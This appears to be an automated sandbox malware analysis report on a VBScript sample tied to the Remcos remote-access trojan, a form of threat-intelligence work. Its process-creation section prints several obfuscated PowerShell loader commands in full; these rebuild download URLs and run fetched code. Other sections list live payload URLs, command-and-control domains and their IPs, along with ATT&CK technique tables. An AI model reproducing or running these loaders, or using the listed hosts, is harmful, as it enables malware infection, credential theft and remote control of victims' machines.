          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "++$skatepark;++$skatepark;$skatepark=$skatepark-1;function quenchlessness ($kineser){$unenterprised=5;$unenterprised++;for($calin=5; $calin -lt $kineser.length-1; $calin+=$unenterprised){$universitetsstillinger = 'substring';$bjorn181=$kineser.$universitetsstillinger.invoke($calin, 1);$windlestrae27=$windlestrae27+$bjorn181}$windlestrae27;}$planteskoles=quenchlessness 'trommhjallst disct egerpabb kskrill:lands/invin/krselba,armrsa psufarcesflakktt.itoi.athoasusc,a vestl begyffum dahinge.d,putwfodbreau,orbkr stscylini betanoppus. tydnitry.ltimpi,/,hyllplejebrfremsofrededwoolsu sugakoldebt lampitndinotar.knmidscse cephdownla.istal myoblsko peribbin tilhscrimi.bill tattaihnoedbn book ';$udenrigsredaktrerne=$planteskoles.split([char]62);$planteskoles=$udenrigsredaktrerne[0];$affattendes62=quenchlessness ' si.ki.acroerestixabear ';$determents = quenchlessness 'ilksc\s,bsis b,mbytalegsflagewavlerobonifwrandp6 synt4ba.om\ hypow dityimidesnnoma,d randorejouwchok sspec,plinneo vandwdri he kn proverrspo,yghjuvene vampls bstlluxem\gaussvmusc 1a,koh.vid,l0ronsa\monebpha.anobarnsw,rimlehenslr overspreouhsaerde .quilaabenl sesq.,rikaeoverfxbaj,rebrusk ';&($affattendes62) (quenchlessness 'gur.e$.ronovcryoganond,lzantcs scriesta.dnagalld ethieale osskamf=regel$congreafpl nerh evus kk:mng.ewmoneyil,mbunforandorienip ebercyclo ') ;&($affattendes62) (quenchlessness 'svejs$ligsydkursnekultitinvese r,plrfuttomhoverel,ngunblodbtramposbushn=ti.ca$aug.sv rigsakampflkultusnon.iegenern horud elmaeforskslovo.+normf$favntdce aseb,tastectopecluckr d,somdragre pakkn lystt armbs ram ') ;&($affattendes62) (quenchlessness ' opl$ kur,cskrivapla.tlbuckhvapproipaafytbint.y biff kolla=s osn alcyo( aspe( chaiggo erwindermpl ini idea 
pelliwbilliiflyd.n.chis3mon,z2kondo_ces.ipsuiverombroorom.nclivsne mdirsscraistilla ,esod-bombefkultu kerapjvn nr adelo.ankmcmi.seeretinsreharsalangisuperd nonr=takke$looky{nakkep la.rikonfedhy ro}heth.)subsu.marvecwebbiordnesm ivy mpalerasletbns.romdstikdl hystifoedsnsp.ose coms)preex purch-syr.isskkebpafstelparanitaftktpan.o fuldf[nonpec tumbhs,blia ascaralmon]bunds3 fr d4pseud ');&($affattendes62) (quenchlessness 'nedra$f.rvohtermlapasquvover aind,vr haanth.emmilods s samf micr=scrag torv,$geleec .veraaleurlskrppv incoifyrettsyn.bystil.[brass$camomc p,maaklitolo.kupvnaturipret,t sepayphyco.arbejcch rooombuduuncasnstraftglide-salgs2sakis] arne ');&($affattendes62) (quenchlessness ' mese$overbihjer,m s ftpdestrowithnnge.taddyrkeebukser algoa.pecibforlalbrumsehil.bn.ndtae ve,ss aques mart=ladyk(krligt sophe dat suddebtsketc- buffpfdemia nonst tranhedvin .ncov$ ge,edstrmae tujattyrkeespinur reinm eliecerebnland,tnogets unr.) d,ne reg,b-cinciaelocunopfoedspico syste( plum[b,ackiube knwartyts ivep ranst rgfare.dot]dekat:n nmo:kon esadrenikablizret.me r,kl deter-se,ise i.teqtjera nekro8forly)scori ') ;if ($imponderableness) {.$determents
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "++$cabinetted;++$cabinetted;$cabinetted=$cabinetted-1;function cert69 ($forretningsnavn){$halvmaanedliges=5;$halvmaanedliges++;for($phylloscopine81=5; $phylloscopine81 -lt $forretningsnavn.length-1; $phylloscopine81+=$halvmaanedliges){$foreadapt = 'substring';$slyngblte=$forretningsnavn.$foreadapt.invoke($phylloscopine81, 1);$olfactible=$olfactible+$slyngblte}$olfactible;}$uppishness=cert69 'hypochfavnttdep.ct ekstpel.dys bowl: libe/snebo/mornem indiaburnes doomooverl.armatgpolypeproj./ desiwbeeswp carp- pr.va ygnid panemetaari acrinfarad/klassrt lkue bestccompriresult do sekartorkvi,kesupert havo.brn ervirusa other in e ';$wergilds=$uppishness.split([char]62);$uppishness=$wergilds[0];$batiste=cert69 ' foreijurateak hexmsurk ';$sjusglas = cert69 ' lsni\ cymesnig eyvrtdys rediwnephronuss wp.eud6lymph4 synt\havarwtan aicarponsam rdpol ro dic.wionpasacardpresgso arguw reseeande rindses frath sarceomhyglpledglseric\d plavsrdom1 .ytr.rekur0st,ld\repatpalcoroskarpwunorte,nglerunagisin.erhwifieeblokel flo.leuphe.numeres.irixr,inoeparal ';&($batiste) (cert69 'sterr$skrivsallo e po.ykfe.lmspos.tt uncou di.lr vrkssargen=.onde$ps.cheepit.nbog nvtrla :m.ltew sbefistrrenj,rntd.amilisvrvgrgamet ') ;&($batiste) (cert69 'askeb$ra,gss cab,j o,gousterss hiocglarl.l gasbaassems per,=cinqu$sarcosvaabeelit.ukunm.nsretintcompuuskri,r luttshanhu+fravl$relegs ndejsicyoupropos splagmildelcr ssafrotts s.rv ') ;&($batiste) (cert69 'wayl,$censul langeunme.a llefcimb,wsilkeoblderrandelm ntes fl.e doku=unrep vexed(afmel( imaggtomhjwbagtrmhana.i ev.n kursuwbortviproclnudkrn3uover2n.npa_chinkp dietrjoggiooccupc detoedemenspseudsaxost propa-o.bytflunyi isoenpseriorunhypotranschatcheb,shbsolofss ubveitraved appr=f.rre$under{ethicp.unsti phaedunpud}tvang),isco.teguccantalou derma socmp.digaf rtinmelildukvemlaerosi 
oxygnchloregitt.)downh boble-contrsunnimp enetlwe biiundert enfe payi [sleigc ari,hbet aaskkevr acid]un.in3gevin4 opfi ');&($batiste) (cert69 'krybe$ kretfhomoferekrnmpol.ttaflydemil in tescaaudioascenarconnis kond til =disin angli$fu,dsl.isexekontrasold,f kvalwchacro brygrkaeftmcr.tisarr y[krysa$ junilnyansebyggea sho,flegemwimpolovidtlrlakfamduniesq,adr.quak crespeoa.rusu onen,omictferth- omkl2c,omp]erst, ');&($batiste) (cert69 ' unde$ .ircfbraysakrageskmpehe unstrbrystutransmhoved= rrie( adskt qualeafgrssintertuitot-ra.urp.ompaacrotctregnsh npac semit$c,ltosdeaccj tostu,rylls udskg pseulfalbyaencrysli,id)cereb n.rve-kam.ea drifnapperds.alc fu te(b.lan[symboi oro n ronatbrom,pkvalitscurrrnonfr]uorga:toba.:b.ithsubevgi forsz squaep,eud scarl-leucoe .illqcorad distr8palli)manip ') ;if ($faserum) {.$sjusglas $femtenaars;} else {;$thysen=cert69 'ant.cskogeptreaccafysiorunschtcalli-ing.obsengei,ircut frdessinusttresirficu.acabbanquonsshjem.f melle.rbitr hvae verti- fidgsstemmorgto,uwulfer fordcperniegudst fors $unpa,unitniphybripdig eililyas sherhalbat
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "++$skatepark;++$skatepark;$skatepark=$skatepark-1;function quenchlessness ($kineser){$unenterprised=5;$unenterprised++;for($calin=5; $calin -lt $kineser.length-1; $calin+=$unenterprised){$universitetsstillinger = 'substring';$bjorn181=$kineser.$universitetsstillinger.invoke($calin, 1);$windlestrae27=$windlestrae27+$bjorn181}$windlestrae27;}$planteskoles=quenchlessness 'trommhjallst disct egerpabb kskrill:lands/invin/krselba,armrsa psufarcesflakktt.itoi.athoasusc,a vestl begyffum dahinge.d,putwfodbreau,orbkr stscylini betanoppus. tydnitry.ltimpi,/,hyllplejebrfremsofrededwoolsu sugakoldebt lampitndinotar.knmidscse cephdownla.istal myoblsko peribbin tilhscrimi.bill tattaihnoedbn book ';$udenrigsredaktrerne=$planteskoles.split([char]62);$planteskoles=$udenrigsredaktrerne[0];$affattendes62=quenchlessness ' si.ki.acroerestixabear ';$determents = quenchlessness 'ilksc\s,bsis b,mbytalegsflagewavlerobonifwrandp6 synt4ba.om\ hypow dityimidesnnoma,d randorejouwchok sspec,plinneo vandwdri he kn proverrspo,yghjuvene vampls bstlluxem\gaussvmusc 1a,koh.vid,l0ronsa\monebpha.anobarnsw,rimlehenslr overspreouhsaerde .quilaabenl sesq.,rikaeoverfxbaj,rebrusk ';&($affattendes62) (quenchlessness 'gur.e$.ronovcryoganond,lzantcs scriesta.dnagalld ethieale osskamf=regel$congreafpl nerh evus kk:mng.ewmoneyil,mbunforandorienip ebercyclo ') ;&($affattendes62) (quenchlessness 'svejs$ligsydkursnekultitinvese r,plrfuttomhoverel,ngunblodbtramposbushn=ti.ca$aug.sv rigsakampflkultusnon.iegenern horud elmaeforskslovo.+normf$favntdce aseb,tastectopecluckr d,somdragre pakkn lystt armbs ram ') ;&($affattendes62) (quenchlessness ' opl$ kur,cskrivapla.tlbuckhvapproipaafytbint.y biff kolla=s osn alcyo( aspe( chaiggo erwindermpl ini idea pelliwbilliiflyd.n.chis3mon,z2kondo_ces.ipsuiverombroorom.nclivsne mdirsscraistilla 
,esod-bombefkultu kerapjvn nr adelo.ankmcmi.seeretinsreharsalangisuperd nonr=takke$looky{nakkep la.rikonfedhy ro}heth.)subsu.marvecwebbiordnesm ivy mpalerasletbns.romdstikdl hystifoedsnsp.ose coms)preex purch-syr.isskkebpafstelparanitaftktpan.o fuldf[nonpec tumbhs,blia ascaralmon]bunds3 fr d4pseud ');&($affattendes62) (quenchlessness 'nedra$f.rvohtermlapasquvover aind,vr haanth.emmilods s samf micr=scrag torv,$geleec .veraaleurlskrppv incoifyrettsyn.bystil.[brass$camomc p,maaklitolo.kupvnaturipret,t sepayphyco.arbejcch rooombuduuncasnstraftglide-salgs2sakis] arne ');&($affattendes62) (quenchlessness ' mese$overbihjer,m s ftpdestrowithnnge.taddyrkeebukser algoa.pecibforlalbrumsehil.bn.ndtae ve,ss aques mart=ladyk(krligt sophe dat suddebtsketc- buffpfdemia nonst tranhedvin .ncov$ ge,edstrmae tujattyrkeespinur reinm eliecerebnland,tnogets unr.) d,ne reg,b-cinciaelocunopfoedspico syste( plum[b,ackiube knwartyts ivep ranst rgfare.dot]dekat:n nmo:kon esadrenikablizret.me r,kl deter-se,ise i.teqtjera nekro8forly)scori ') ;if ($imponderableness) {.$determents Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "++$skatepark;++$skatepark;$skatepark=$skatepark-1;function quenchlessness ($kineser){$unenterprised=5;$unenterprised++;for($calin=5; $calin -lt $kineser.length-1; $calin+=$unenterprised){$universitetsstillinger = 'substring';$bjorn181=$kineser.$universitetsstillinger.invoke($calin, 1);$windlestrae27=$windlestrae27+$bjorn181}$windlestrae27;}$planteskoles=quenchlessness 'trommhjallst disct egerpabb kskrill:lands/invin/krselba,armrsa psufarcesflakktt.itoi.athoasusc,a vestl begyffum dahinge.d,putwfodbreau,orbkr stscylini betanoppus. tydnitry.ltimpi,/,hyllplejebrfremsofrededwoolsu sugakoldebt lampitndinotar.knmidscse cephdownla.istal myoblsko peribbin tilhscrimi.bill tattaihnoedbn book ';$udenrigsredaktrerne=$planteskoles.split([char]62);$planteskoles=$udenrigsredaktrerne[0];$affattendes62=quenchlessness ' si.ki.acroerestixabear ';$determents = quenchlessness 'ilksc\s,bsis b,mbytalegsflagewavlerobonifwrandp6 synt4ba.om\ hypow dityimidesnnoma,d randorejouwchok sspec,plinneo vandwdri he kn proverrspo,yghjuvene vampls bstlluxem\gaussvmusc 1a,koh.vid,l0ronsa\monebpha.anobarnsw,rimlehenslr overspreouhsaerde .quilaabenl sesq.,rikaeoverfxbaj,rebrusk ';&($affattendes62) (quenchlessness 'gur.e$.ronovcryoganond,lzantcs scriesta.dnagalld ethieale osskamf=regel$congreafpl nerh evus kk:mng.ewmoneyil,mbunforandorienip ebercyclo ') ;&($affattendes62) (quenchlessness 'svejs$ligsydkursnekultitinvese r,plrfuttomhoverel,ngunblodbtramposbushn=ti.ca$aug.sv rigsakampflkultusnon.iegenern horud elmaeforskslovo.+normf$favntdce aseb,tastectopecluckr d,somdragre pakkn lystt armbs ram ') ;&($affattendes62) (quenchlessness ' opl$ kur,cskrivapla.tlbuckhvapproipaafytbint.y biff kolla=s osn alcyo( aspe( chaiggo erwindermpl ini idea 
pelliwbilliiflyd.n.chis3mon,z2kondo_ces.ipsuiverombroorom.nclivsne mdirsscraistilla ,esod-bombefkultu kerapjvn nr adelo.ankmcmi.seeretinsreharsalangisuperd nonr=takke$looky{nakkep la.rikonfedhy ro}heth.)subsu.marvecwebbiordnesm ivy mpalerasletbns.romdstikdl hystifoedsnsp.ose coms)preex purch-syr.isskkebpafstelparanitaftktpan.o fuldf[nonpec tumbhs,blia ascaralmon]bunds3 fr d4pseud ');&($affattendes62) (quenchlessness 'nedra$f.rvohtermlapasquvover aind,vr haanth.emmilods s samf micr=scrag torv,$geleec .veraaleurlskrppv incoifyrettsyn.bystil.[brass$camomc p,maaklitolo.kupvnaturipret,t sepayphyco.arbejcch rooombuduuncasnstraftglide-salgs2sakis] arne ');&($affattendes62) (quenchlessness ' mese$overbihjer,m s ftpdestrowithnnge.taddyrkeebukser algoa.pecibforlalbrumsehil.bn.ndtae ve,ss aques mart=ladyk(krligt sophe dat suddebtsketc- buffpfdemia nonst tranhedvin .ncov$ ge,edstrmae tujattyrkeespinur reinm eliecerebnland,tnogets unr.) d,ne reg,b-cinciaelocunopfoedspico syste( plum[b,ackiube knwartyts ivep ranst rgfare.dot]dekat:n nmo:kon esadrenikablizret.me r,kl deter-se,ise i.teqtjera nekro8forly)scori ') ;if ($imponderableness) {.$determents Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

          Remote Access Functionality

          Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 321 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 321 Scripting | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 11 Input Capture | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 111 Process Injection | 1 Software Packing | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | 1 BITS Jobs | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | 1 Registry Run Keys / Startup Folder | Login Hook | 1 Masquerading | NTDS | 131 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Modify Registry | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 161 Virtualization/Sandbox Evasion | Cached Domain Credentials | 161 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 BITS Jobs | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

          [Behavior graph (image not reproduced): ID 1410613, Sample: BKGCONF-THD1914129-BKGCONF-..., Startdate: 18/03/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| BKGCONF-THD1914129-BKGCONF-THD1914129.vbs | 0% | ReversingLabs | | |
| BKGCONF-THD1914129-BKGCONF-THD1914129.vbs | 0% | Virustotal | | Browse |

No Antivirus matches

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| rnnfibiteammony.duckdns.org | 15% | Virustotal | | Browse |
| tolatilbu.hopto.org | 15% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://crl.micro | 0% | URL Reputation | safe | |
| http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware | |
| https://go.micro | 0% | URL Reputation | safe | |
| https://contoso.com/ | 0% | URL Reputation | safe | |
| https://contoso.com/License | 0% | URL Reputation | safe | |
| https://contoso.com/Icon | 0% | URL Reputation | safe | |
| https://maso.ge/wp-admin/gGzbBm204.bin | 0% | Avira URL Cloud | safe | |
| https://brustiaalfa.websin.it/Produktionshallens.thn | 0% | Avira URL Cloud | safe | |
| https://maso.ge/wp-admin/Reciteret.rar | 0% | Avira URL Cloud | safe | |
| http://crl.microR | 0% | Avira URL Cloud | safe | |
| https://brustiaalfa.websin.it/zwDhHUJEmBIkUtXcwKsarX186.bin | 0% | Avira URL Cloud | safe | |
| https://maso.ge/wp-admin/Klassespecifikke.vbs | 0% | Avira URL Cloud | safe | |
| https://brustiaalfa.websin.it/Produktionshallens.thnp | 0% | Avira URL Cloud | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| brustiaalfa.websin.it | 89.40.227.248 | true | false | | unknown |
| rnnfibiteammony.duckdns.org | 180.214.236.46 | true | true | | unknown |
| maso.ge | 195.54.178.4 | true | false | | unknown |
| tolatilbu.hopto.org | unknown | unknown | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://maso.ge/wp-admin/gGzbBm204.bin | false | Avira URL Cloud: safe | unknown |
| https://brustiaalfa.websin.it/zwDhHUJEmBIkUtXcwKsarX186.bin | false | Avira URL Cloud: safe | unknown |
| https://maso.ge/wp-admin/Reciteret.rar | false | Avira URL Cloud: safe | unknown |
| https://brustiaalfa.websin.it/Produktionshallens.thn | false | Avira URL Cloud: safe | unknown |
| https://maso.ge/wp-admin/Klassespecifikke.vbs | false | Avira URL Cloud: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://g.live.com/odclientsettings/Prod/C: | svchost.exe, 00000006.00000003.2272203577.00000273EF1A3000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2842855560.00000220BC3DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA6EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2842855560.00000220BAA2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.0000000005776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://crl.micro | powershell.exe, 00000005.00000002.2801177789.000000000709B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://go.micro | powershell.exe, 00000003.00000002.2842855560.00000220BB5A0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://aka.ms/pscore6lBeq | powershell.exe, 00000005.00000002.2768378131.0000000004711000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2900292990.00000220CA6EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2842855560.00000220BA8B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.0000000005776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://contoso.com/Icon | powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000006.00000003.2272203577.00000273EF130000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.2842855560.00000220BA681000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2842855560.00000220BA681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2768378131.0000000004711000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://crl.microR | powershell.exe, 00000005.00000002.2765789549.000000000099C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://brustiaalfa.websin.it/Produktionshallens.thnp | powershell.exe, 00000003.00000002.2842855560.00000220BA8B1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious
195.54.178.4 | maso.ge | Georgia | 51147 | ASDELTATELECOMRU | false
89.40.227.248 | brustiaalfa.websin.it | Romania | 49367 | ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | false
180.214.236.46 | rnnfibiteammony.duckdns.org | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
                                IP
                                127.0.0.1
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1410613
                                Start date and time:2024-03-18 08:06:11 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:18
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Sample name:BKGCONF-THD1914129-BKGCONF-THD1914129.vbs
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winVBS@22/16@13/4
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 70%
                                • Number of executed functions: 37
                                • Number of non-executed functions: 15
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Connection to analysis system has been lost, crash info: Unknown
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                • Excluded IPs from analysis (whitelisted): 40.126.24.149, 40.126.24.146, 40.126.24.148, 40.126.24.83, 40.126.24.82, 40.126.24.147, 40.126.24.84, 20.190.152.20
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Execution Graph export aborted for target powershell.exe, PID 1628 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 1960 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5312 because it is empty
                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
